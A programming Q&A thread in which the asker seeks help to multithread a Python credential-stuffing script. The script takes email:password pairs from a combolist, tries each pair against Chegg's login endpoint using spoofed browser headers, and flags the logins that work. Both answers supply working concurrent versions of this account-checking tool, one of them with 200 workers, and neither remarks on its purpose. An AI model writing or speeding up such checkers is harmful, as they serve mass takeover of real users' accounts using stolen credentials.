# How do I implement threading to the same function but with different parameters?

Tags: python

So, I have a combolist.txt with accounts(email:password), when I run this code I want it to check 50 accounts at the same time using threading. With this code as it is right now it will check correctly but 1 by one and slowly.

```
from time import sleep
import requests
import threading

#opening combo list
combolist = open("combo.txt", "r").readlines()
url = "https://www.chegg.com/auth?action=login"


#run as long as there are accounts in the list
for combo in combolist:
    #split the combo into username and password
    seq = combo.strip()
    acc = seq.split(":")
    username = acc[0]
    password = acc[1]
    account = username + ":" + password

    
    #data for the post request
    data = {
        'clientId': 'CHGG',
        'redirect_uri': '',
        'state':'', 
        'responseType': '',
        'email': username,
        'password': password,
        'version': '2.124.103',
        'profileId': 'CHGG',
        'origin': 'https://www.chegg.com',
        'referer': 'https://www.chegg.com/',
        'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"',
        'sec-ch-ua-mobile': '?0',
        'sec-ch-ua-platform': '"Windows"',
        'sec-fetch-dest': 'empty',
        'sec-fetch-mode': 'cors',
        'sec-fetch-site': 'same-site',
        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36',
    }

    _post = requests.post(url, data=data).text
    sleep(2)
    #keycheck
    if "Logout" in _post:
        print("[+] GOOD: " + account)
    else:
        print("[-] BAD: " + account)
```

Comment: You could try a ThreadPoolExecutor. I find the [map](https://docs.python.org/3/library/concurrent.futures.html#concurrent.futures.Executor.map) method particularly helpful.

Comment: is your current code running correctly with single multiple accounts with out threading?

Comment: yes, it's working correctly without threading.

Answer (score 0, accepted):

The following code does what you want to, basically it creates a separate thread for each account login with parameters, The code is not tested as i have no file that is being used to run the code, but it will provide you a basic starting point, its possible for the code to have small bugs or errors as it's not tested, check the comments to understand the changes.

```
from time import sleep
import requests
from threading import Thread

threads = []
def CheckAccount(username, password):
    #convert the login process in to the function to make it dynamic for different accounts
    #data for the post request
    account = username + ': ' + password
    data = {
        'clientId': 'CHGG',
        'redirect_uri': '',
        'state':'', 
        'responseType': '',
        'email': username,
        'password': password,
        'version': '2.124.103',
        'profileId': 'CHGG',
        'origin': 'https://www.chegg.com',
        'referer': 'https://www.chegg.com/',
        'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"',
        'sec-ch-ua-mobile': '?0',
        'sec-ch-ua-platform': '"Windows"',
        'sec-fetch-dest': 'empty',
        'sec-fetch-mode': 'cors',
        'sec-fetch-site': 'same-site',
        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36',
    }

    _post = requests.post(url, data=data).text
    sleep(2)
    #keycheck
    if "Logout" in _post:
        print("[+] GOOD: " + account)
    else:
        print("[-] BAD: " + account)  

#opening combo list
combolist = open("combo.txt", "r").readlines()
url = "https://www.chegg.com/auth?action=login"


#run as long as there are accounts in the list
for combo in combolist:
    #split the combo into username and password
    seq = combo.strip()
    acc = seq.split(":")
    
    #initialize a thread for this particular username and password
    _thread = Thread(target = CheckAccount, args=(acc[0],, acc[1])) #username and password are passed here
    _thread.start() #start the thread it will actually init the login process
    threads.append(_thread) #maintain a list for all created and running threads, simply we are appending every new thread to the list
    sleep(0.2) # wait a bit before next account thread creation

for t in threads:
    #for each thread wait for its completion
    t.join()
```

The disadvantages of this approach are following

1. N no of threads for N no of accounts, it can crash machine if too much accounts need to control the active threads count.
2. Proper exception handling should be used for production usage

Comment: it's working !! now can you tell me how do i make more threads? like add 50threads

Comment: the current implementation is spawning the same no of threads as of accounts that means if you have 50 accounts in your file it will spawn 50 threads

Answer (score -1):

I feel like the question asked and what you are trying to do are different things; Anywho I would use `concurrent.futures and ThreadPoolExecutor` to get this done as they are easier than using the `threading` module.

This [Link](https://stackoverflow.com/questions/63087983/how-to-send-post-requests-using-multi-threading-in-python) will help you with what you are trying to do.

```
import requests
from concurrent.futures import ThreadPoolExecutor, as_completed

#opening combo list
combolist = open("combo.txt", "r").readlines()
url = "https://www.chegg.com/auth?action=login"
data_list = []

#run as long as there are accounts in the list
for combo in combolist:
    #split the combo into username and password
    seq = combo.strip()
    acc = seq.split(":")
    username = acc[0]
    password = acc[1]
    account = username + ":" + password

    
    #data for the post request
    data = {
        'clientId': 'CHGG',
        'redirect_uri': '',
        'state':'', 
        'responseType': '',
        'email': username,
        'password': password,
        'version': '2.124.103',
        'profileId': 'CHGG',
        'origin': 'https://www.chegg.com',
        'referer': 'https://www.chegg.com/',
        'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"',
        'sec-ch-ua-mobile': '?0',
        'sec-ch-ua-platform': '"Windows"',
        'sec-fetch-dest': 'empty',
        'sec-fetch-mode': 'cors',
        'sec-fetch-site': 'same-site',
        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36',
    }
    data_list.append(data)

def get_data(data):
    _post = requests.post(url, data=data).text
    sleep(2)
    #keycheck
    if "Logout" in _post:
        print("[+] GOOD: " + account)
    else:
        print("[-] BAD: " + account)
        
processes = []
with ThreadPoolExecutor(max_workers=200) as executor:
    for data in data_list:
        processes.append(executor.submit(get_data, data))
```